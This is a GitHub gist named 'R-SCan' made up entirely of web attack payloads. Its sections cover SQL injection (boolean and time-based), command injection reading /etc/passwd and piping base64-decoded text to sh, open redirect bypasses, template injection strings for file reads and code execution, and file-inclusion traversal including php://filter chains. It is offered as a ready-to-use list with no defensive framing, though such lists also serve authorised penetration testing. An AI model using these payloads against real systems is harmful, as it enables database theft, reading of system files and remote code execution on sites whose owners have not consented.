Skip to content

Instantly share code, notes, and snippets.

@ratnadip1998

ratnadip1998/gist:e0f6697b8568697ef697172d71ad0383

Last active January 27, 2026 23:34
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save ratnadip1998/e0f6697b8568697ef697172d71ad0383 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save ratnadip1998/e0f6697b8568697ef697172d71ad0383 to your computer and use it in GitHub Desktop.
Download ZIP
R-SCan
Raw
gistfile1.txt
1. SQLI:
'
"
')
")
'))
"))
'--
"--
'#
"#
'/*
'--
'--+
'#
/* */
'+OR+updatexml(1,concat(0x7e,user(),0x7e),1)--
'+OR+extractvalue(1,concat(0x7e,version(),0x7e))--
'+OR+1=CAST(version()+AS+INT)--
'+OR+1=CONVERT(int,@@version)--
'+OR+1=TO_NUMBER(DBMS_VERSION.VERSION)--
'+OR+sqlite_version()--
'OR+''+=+'
'+OR+1=1--
'+OR+1=2--
'+AND+1=1--
'+AND+1=2--
')+OR+('1'='1
')+OR+('1'='2
'+OR+1=1#
'+OR+1=2#
'+AND+1=1#
'+AND+1=2#
'+OR+1=1--
'+OR+1=2--
'+OR+1=1+FROM+dual--
'+OR+1=2+FROM+dual--
'+AND+1=CAST(1+AS+INT)=1
'+AND+1=CAST(1+AS+INT)=2
'+sleep(10)
'+sleep(10)--
')+or+sleep(10)='
+sleep(10)
+sleep(10)#
+sleep(10)--
+sleep(10)/*"+or+sleep(10)+or+'"+or+sleep(10)+or+'"/
+sleep(10)/*'+or+sleep(10)+or+'"+or+sleep(10)+or+"*/
+sleep(10)/*'or+sleep(10)or'"or+sleep(10)+or"*/
+sleep(10)="
+sleep(10)='
'=sleep(10)='1
'and+sleep(10)
'and+sleep(10)--
'+and+sleep(10)+and+'1
'and+sleep(10)--ratnadip
'and+sleep(10)and'1
&&sleep(10)
&&sleep(10)#
&&sleep(10)--
'&&sleep(10)&&'1
+or+sleep(10)
+or+sleep(10)#
+or+sleep(10)--
+or+sleep(10)="
'or+sleep(10)'
'))+or+sleep(10)='
+or+sleep(10)='
+(select+sleep(10))
++sleep(10)+++'
+and+sleep(10)
+and+sleep(10)#
+and+sleep(10)+and+('kleiton'='kleiton
+and+sleep(10)--
+and+sleep(10)--ratnadip
+order+by+sleep(10)
+order+by+sleep(10)#
+order+by+sleep(10)--
'+or+sleep(10)
'+or+sleep(10)#
'+or+sleep(10)--
'+or+sleep(10)='
")+or+sleep(10)="
'+or+sleep(10)=0+#
"+or+sleep(10)#
"+or+sleep(10)="
'+or+sleep(10)=0%23
'))+or+pg_sleep(10)--
')+or+pg_sleep(10)--
'+or+pg_sleep(10)--
'+or+sleep(10)=0%2f%2a
'+or+sleep(10)=0/*
+pg_sleep(10)
+pg_sleep(10)#
+pg_sleep(10)--
+or+pg_sleep(10)
"+or+pg_sleep(10)--
+or+pg_sleep(10)#
+or+pg_sleep(10)--
1))+or+pg_sleep(10)--
1))+or+sleep(10)#
1)+or+pg_sleep(10)--
1)+or+sleep(10)#
1+or+pg_sleep(10)--
"))+or+pg_sleep(10)--
"))+or+sleep(10)="
+or+(sleep(10)+1)+limit+1+--
")+or+pg_sleep(10)--
;waitfor+delay+'0:0:10'--
+waitfor+delay+'00:00:10'
+waitfor+delay+'00:00:10'#
+waitfor+delay+'00:00:10'--
';waitfor+delay+'0:0:10'--
";waitfor+delay+'0:0:10'--
"));waitfor+delay+'0:0:10'--
");waitfor+delay+'0:0:10'--
'));waitfor+delay+'0:0:10'--
));waitfor+delay+'0:0:10'--
);waitfor+delay+'0:0:10'--
');waitfor+delay+'0:0:10'--
'));waitfor+delay+'0:0:10'--
+(select(0)from(select(sleep(10)))v)
+(select(0)from(select(sleep(10)))v)%2f'+
+(select(0)from(select(sleep(10)))v)/*'+(select(3)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
+(select(0)fron(select(sleep(10))v)+'"+
+(select*from(select(sleep(10)))a)
+(select+*+from+(select(sleep(10)))ecmj)
+(select+*+from+(select(sleep(10)))ecmj)#
+(select+*+from+(select(sleep(10)))ecmj)--
+(select+*+from+(select(sleep(10)))yyyy)
+(select+*+from+(select(sleep(10)))yyyy)#
+(select+*+from+(select(sleep(10)))yyyy)--
+(select+1+from+(select+sleep(10))a)
+and(select+6229+from(select(sleep(10)))hzqt)and'rljn'='rljn
+and+(select+*+from+(select(sleep(10)))bakl)+and+'vrxe'='vrxe
+and+(select+*+from+(select(sleep(10)))nqip)
+and+(select+*+from+(select(sleep(10)))nqip)#
+and+(select+*+from+(select(sleep(10)))nqip)--
+and+(select+*+from+(select(sleep(10)))yjoc)+and+'%'='
+and+(select+1033+from+(select(sleep(10)))xyjh)--+
+and+1091010=benchmark(10000000,md10(0x44444e4f))
+and+29410=like('abcdefg',upper(hex(randomblob(1000000000/2))))
+and+2947=like('abcdefg',upper(hex(randomblob(1000000000/2))))
+and+if(substring(user(),1,1)>=chr(910),sleep(10),1)--
,(select*from(select(sleep(10)))a)
,(select+*+from+(select(sleep(10)))a)
-1+or+1%3d((select+1+from+(select+sleep(10))a))
-1+or+1=((select+1+from+(select+sleep(10))a))
/*!133310'+and+(select+1033+from+(select(sleep(10)))xyjh)*/
%2b(select*from(select(sleep(10)))a)%2b'
%2c(select%20*%20from%20(select(sleep(10)))a)
%2c(select%5*%5from%5(select(sleep(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
'%2b(select*from(select(sleep(2)))a)%2b'
''||(select+1+from+(select+pg_sleep(10))x)||''
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
'+(select*from(select(sleep(10)))a)+'
;select+if((8303>8302),sleep(10),2356)#+
'and(select+1033+from(select(sleep(10)))xyjh)--+-
'and(select+6229+from(select(sleep(10)))hzqt)and'rljn'='rljn
'and+1091010=benchmark(10000000,md10(0x44444e4f))
'and+29410=like('abcdefg',upper(hex(randomblob(1000000000/2))))
'or+29410=like('abcdefg',upper(hex(randomblob(1000000000/2))))
desc%2c(select*from(select(sleep(10)))a)
',''),/*test*/%26%26%09sleep(10)%09--+
/**/xor/**/sleep(10)
0'x0r(if(now()=sysdate(),sleep(10*1),0))xor'z
0'xor(if(now()=sysdate(),sleep(10),0))x0r'z
1'%2b(select*from(select(sleep(10)))a)%2b'
'xor(if(now()=sysdate(),sleep(10),0))or'
'xor(if(now()=sysdate(),sleep(10),0))x0r'
'xor(if(now()=sysdate(),sleep(10),0))x0r'z
'xor(if(now()=sysdate(),sleep(10),0))xor'z
'xor(if(now()=sysdate(),sleep(5*5),0))or'
'xor(if(now()=sysdate(),sleep(6+1),0))0r'
+'x0r(if(now()=sysdate(),sleep(10*1),0))xor'z
"xor(if(now()=sysdate(),sleep(10),0))xor"z
)if(1=1,sleep(10),0)(/*')xor(if(1=1,sleep(10),0))or('")xor(if(1=1,sleep(10),0))or("*/
+(if(now()=sysdate(),sleep(10),0)+and+10=10)"/
+if(1=1,sleep(10),0)/*'xor(if(1=1,sleep(10),0))or'"xor(if(1=1,sleep(10),0))or"*/
+if(4148=4148,exp(~(1)),0)/*'xor(if(4148=4148,exp(~(1)),0))or'"xor(if(4148=4148,sleep(10),0))or"*/
+if(now()=sysdate(),sleep(10),0)
+if(now()=sysdate(),sleep(10),0)/"xor(if(now()=sysdate(),sleep(10),0))or"/
+if(now()=sysdate(),sleep(10),0)/'xor(1f(now()=sysdate(),sleep(10),0))0r'"xor
+if(now()=sysdate(),sleep(10),0)/+xor(if(now()=sysdate(),sleep(10),0))or'"xor(if(now()=sysdate(),sleep(10),0))0r"*/
+or+29410=like('abcdefg',upper(hex(randomblob(1000000000/2))))
+or+2947=like('abcdefg',upper(hex(randomblob(1000000000/2))))
1))+or+benchmark(10000000,md10(10))#
1)+or+benchmark(10000000,md10(10))#
1+or+benchmark(10000000,md10(10))#
+benchmark(10000000,md10(10))#
+benchmark(100000000,md10(10))
+benchmark(100000000,md10(10))#
+benchmark(100000000,md10(10))--
+benchmark(3100,sha1(10))+'
)+or+benchmark(10000000,md10(1))#
'))+or+benchmark(10000000,md10(10))#
"))+or+benchmark(10000000,md10(10))#
")+or+benchmark(10000000,md10(10))#
"+or+benchmark(10000000,md10(10))#
')+or+benchmark(10000000,md10(10))#
'+or+benchmark(10000000,md10(10))#
+or+benchmark(100000000,md10(10))
+or+benchmark(100000000,md10(10))#
+or+benchmark(100000000,md10(10))--
+randomblob(1000000000/2)
2. CMD Injection:
; ls
| ls
|| ls
& ls
&& ls
` ls `
$( ls )
%00; ls
%00| ls
%00& ls
%00&& ls
%0als
%0d%0als
; id
| id
|| id
& id
&& id
` id `
$( id )
%00; id
%00| id
%00& id
%00&& id
%0aid
%0d%0aid
; whoami
| whoami
|| whoami
& whoami
&& whoami
` whoami `
$( whoami )
%00; whoami
%00| whoami
%00& whoami
%00&& whoami
%0awhoami
%0d%0awhoami
; pwd
| pwd
|| pwd
& pwd
&& pwd
` pwd `
$( pwd )
%00; pwd
%00| pwd
%00& pwd
%00&& pwd
%0apwd
%0d%0apwd
; cat /etc/passwd
| cat /etc/passwd
|| cat /etc/passwd
& cat /etc/passwd
&& cat /etc/passwd
` cat /etc/passwd `
$( cat /etc/passwd )
%00; cat /etc/passwd
%00| cat /etc/passwd
%00& cat /etc/passwd
%00&& cat /etc/passwd
%0acat /etc/passwd
%0d%0acat /etc/passwd
; echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d | sh
| echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d | sh
|| echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d | sh
& echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d | sh
&& echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d | sh
; perl -e 'system("cat /etc/passwd")'
| perl -e 'system("cat /etc/passwd")'
|| perl -e 'system("cat /etc/passwd")'
& perl -e 'system("cat /etc/passwd")'
&& perl -e 'system("cat /etc/passwd")'
; python -c 'import os;os.system("cat /etc/passwd")'
| python -c 'import os;os.system("cat /etc/passwd")'
|| python -c 'import os;os.system("cat /etc/passwd")'
& python -c 'import os;os.system("cat /etc/passwd")'
&& python -c 'import os;os.system("cat /etc/passwd")'
; ruby -e 'system("cat /etc/passwd")'
| ruby -e 'system("cat /etc/passwd")'
|| ruby -e 'system("cat /etc/passwd")'
& ruby -e 'system("cat /etc/passwd")'
&& ruby -e 'system("cat /etc/passwd")'
; php -r 'system("cat /etc/passwd");'
| php -r 'system("cat /etc/passwd");'
|| php -r 'system("cat /etc/passwd");'
& php -r 'system("cat /etc/passwd");'
&& php -r 'system("cat /etc/passwd");'
; awk 'BEGIN {system("cat /etc/passwd")}'
| awk 'BEGIN {system("cat /etc/passwd")}'
|| awk 'BEGIN {system("cat /etc/passwd")}'
& awk 'BEGIN {system("cat /etc/passwd")}'
&& awk 'BEGIN {system("cat /etc/passwd")}'
; sleep 10
| sleep 10
|| sleep 10
& sleep 10
&& sleep 10
` sleep 10 `
$( sleep 10 )
%00; sleep 10
%00| sleep 10
%00|| sleep 10
%00& sleep 10
%00&& sleep 10
%0asleep 10
%0d%0asleep 10
; ping -c 10 127.0.0.1
| ping -c 10 127.0.0.1
|| ping -c 10 127.0.0.1
& ping -c 10 127.0.0.1
&& ping -c 10 127.0.0.1
` ping -c 10 127.0.0.1 `
$( ping -c 10 127.0.0.1 )
%00; ping -c 10 127.0.0.1
%00| ping -c 10 127.0.0.1
%00& ping -c 10 127.0.0.1
%00&& ping -c 10 127.0.0.1
%0aping -c 10 127.0.0.1
%0d%0aping -c 10 127.0.0.1
; dir
| dir
|| dir
& dir
&& dir
` dir `
$( dir )
%00; dir
%00| dir
%00& dir
%00&& dir
%0adir
%0d%0adir
3. Open Redirection:
# --- 1) Protocol Based ---
//google.com
https://google.com
http://google.com
//google.com/
///google.com
# --- 2) URL Encoding Variations ---
//google.com%00
//google.com%0D%0A
//google%E3%80%82com
%2F%2Fgoogle.com
%5C%5Cgoogle.com
# --- 3) Backslash Tricks ---
\\/\\/google.com
\\/google.com
\\google.com
/\\/\\/google.com
# --- 4) At Symbol (@) Abuse ---
//google.com@victim.com
https://google.com@victim.com
//victim.com@google.com
https://victim.com@google.com
# --- 5) Hash and Semicolon Bypasses ---
//google.com#@victim.com
//google.com;@victim.com
//google.com;victim.com
# --- 6) Parameter Pollution (payloads themselves) ---
?url=//google.com
?redirect=https://google.com
?next=//google.com
?return=https://google.com
?returnTo=//google.com
# --- 7) JavaScript & Data URIs ---
javascript:alert(1)
javascript://google.com%0Aalert(1)
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
# --- 8) Unicode and Alternative Characters ---
//google。com
//google%E3%80%82com
//google%u3002com
# --- 9) IP Address Variants ---
//127.0.0.1
//0x7f.0x0.0x0.0x1
//localhost
//[::1]
# --- 10) Double Encoding ---
/%252fgoogle.com
/%255cgoogle.com
//%252fgoogle.com
# --- 11) common legit-looking redirect bypass patterns
//google.com/%2f..
//google.com/%2e%2e
//google.com/%23@victim.com
//google.com/%3b@victim.com
# --- 12) mixed scheme obfuscation
http:////google.com
https:////google.com
# --- 13) tab/newline tricks
//google.com%09
//google.com%0a
//google.com%0d
# --- 14) dot tricks
//google.com.
//google.com..
# --- 15) userinfo tricks
https://victim.com:443@google.com
http://victim.com@google.com
# --- 16) encoded slashes in front
%2f%2fgoogle.com
%2F%2Fgoogle.com
# --- 17) backslash encoded
%5c%5cgoogle.com
%255c%255cgoogle.com
# --- 18) relative redirects that sometimes become open redirect (bad normalization)
/\\google.com
//google.com/%2f
4. Server Side Template Injection:
Server Side Template Injection:
# SSTI payloads (one per line)
#Smarty (legacy / unsafe configs)
{7*7}
#Smarty (expression variant)
*{7*7}
#Jinja2 (Python), Twig (PHP), Handlebars (logic-less eval variants)
{{7*7}}
#AngularJS (older versions)
{{=7*7}}
#Twig (block syntax misuse)
{{% 7*7 %}}
#Template nesting test (Twig / ERB hybrids)
{{<% 7*7 %>}}
#Handlebars / Mustache block helper test
{{# 7*7 }}
#Jinja2 / Spring EL edge cases
${{7*7}}
#Velocity (Java), Spring Expression Language (SpEL)
${7*7}
#Velocity (alternate eval syntax)
${= 7*7}
#Spring EL (SpEL)
#{7*7}
#ERB (Ruby)
<%= 7*7 %>
#ERB / JSP scriptlet test
<% 7*7 %>
#PHP short echo (not a template engine, but RCE indicator)
<?=7*7?>
#FreeMarker (Java)
<# 7*7 #>
#Velocity (alternative syntax)
[% 7*7 %]
#Underscore.js / Lodash templates
[%= 7*7 %]
#AngularJS (older interpolation)
[[ 7*7 ]]
#Slim (Ruby)
[- 7*7 -]
#ASP.NET Razor (older / misconfigured)
[=7*7]
#Advanced safe diff proof
{{ 7 * 7 }}
{{7*7}}-{{7*8}}
#Liquid
{{ 7 | times: 7 }}
#Velocity
#set($x=7*7)$x
# Possible fingerprint (no expected)
{{config}}
#file-read
{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
${new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()}
<%= File.read('/etc/passwd') %>
{php}echo file_get_contents('/etc/passwd');{/php}
#RCE
{{lipsum.__globals__['os'].popen('id').read()}}
${T(java.lang.Runtime).getRuntime().exec('id')}
<%= system('id') %>
{php}system('id');{/php}
${"freemarker.template.utility.Execute"?new()("id")}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($ex=$rt.getRuntime().exec('id'))
#{process.mainModule.require('child_process').execSync('id').toString()}
5. Local File Inclusion
etc/passwd
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
..../..../..../etc/passwd
..../..../..../..../etc/passwd
....\....\....\windows\win.ini
....\....\....\....\windows\win.ini
/etc/passwd%00
/etc/passwd%00.jpg
../../../etc/passwd%00
../../../etc/passwd%00.jpg
....//....//....//etc/passwd%00
..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%c0%af..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
..%e0%80%af..%e0%80%afetc/passwd
..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd
..%c1%9c..%c1%9cetc/passwd
..%c0%ae..%c0%ae..%c0%ae/etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%255c..%255c..%255cwindows%255cwin.ini
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%25252f..%25252f..%25252fetc%25252fpasswd
%25252e%25252e%25252f%25252e%25252e%25252fetc%25252fpasswd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
..../..../..../etc/passwd
..../..../..../..../etc/passwd
..../..../..../..../..../etc/passwd
.././.././.././etc/passwd
.././.././.././.././etc/passwd
.\.\.\.\.\.windows\win.ini
.\.\.\.\.\.\.windows\win.ini
/./etc/./passwd
/././etc/././passwd
/./././etc/./././passwd
...//...//.../etc/passwd
...///...///...///etc/passwd
..//..//..//etc/passwd
..\\..\\..\\windows\\win.ini
..\\\\..\\\\..\\\\windows\\\\win.ini
..%5c%5c..%5c%5c..%5c%5cwindows%5c%5cwin.ini
..\/..\/..\/etc/passwd
..\/..\/..\/../etc/passwd
../\../\../\etc/passwd
/etc/passwd%00
/etc/passwd%00.jpg
/etc/passwd%00.php
/etc/passwd%00.txt
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd%00.php
/etc/passwd%2500
/etc/passwd%2500.jpg
../../../etc/passwd%2500
/etc/passwd%00%00
../../../etc/passwd%00%00.jpg
/etc/passwd\x00
../../../etc/passwd\x00.jpg
/etc/passwd%u0000
../../../etc/passwd%u0000.jpg
..\..\..\..\WiNdOwS\wIn.InI
../../../ETC/PASSWD
../../../Etc/Passwd
..%u2216..%u2216etc%u2216passwd
..%u2215..%u2215etc%u2215passwd
..%uFF0F..%uFF0F..%uFF0Fetc%uFF0Fpasswd
../|../|../|etc/passwd
..;<..;<..;<etc/passwd
..%2f..%2f..%2fetc%2fpasswd
..%2F..%2F..%2Fetc%2Fpasswd
..%5c..%5c..%5cwindows%5cwin.ini
..%5C..%5C..%5Cwindows%5Cwin.ini
..%2f..%2F../etc/passwd
..%5c..%5C..\windows\win.ini
..%2f../..%2fetc/passwd
/e/**/tc/p/**/asswd
/e<!-- -->tc/p<!-- -->asswd
/e<>tc/p<>asswd
/etc/ passwd
/etc/ passwd
/ etc / passwd
../../../ etc/ passwd
/etc/ passwd
../../../ etc/ passwd
/etc/%0apasswd
../../../etc/%0apasswd
/etc/%0dpasswd
../../../etc/%0dpasswd
%c0%aeetc%c0%afpasswd
%c0%ae%c0%ae/etc/passwd
%u002e%u002e%u002fetc%u002fpasswd
%u002e%u002e%u005cwindows%u005cwin.ini
/etc/%0apasswd
../../../etc/%0apasswd
/etc/%0dpasswd
../../../etc/%0dpasswd
%c0%aeetc%c0%afpasswd
%c0%ae%c0%ae/etc/passwd
%u002e%u002e%u002fetc%u002fpasswd
%u002e%u002e%u005cwindows%u005cwin.ini
file:///etc/passwd
file://C:/windows/win.ini
expect://cat /etc/passwd
expect://cat%20/etc/passwd
ogg:///etc/passwd
data://text/plain,<?php system('cat /etc/passwd'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTsgPz4=
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
compress.zlib://../../../../../../etc/passwd
compress.zlib://php://filter/convert.base64-encode/resource=/etc/passwd
compress.bzip2://../../../../../../etc/passwd
compress.bzip2://php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment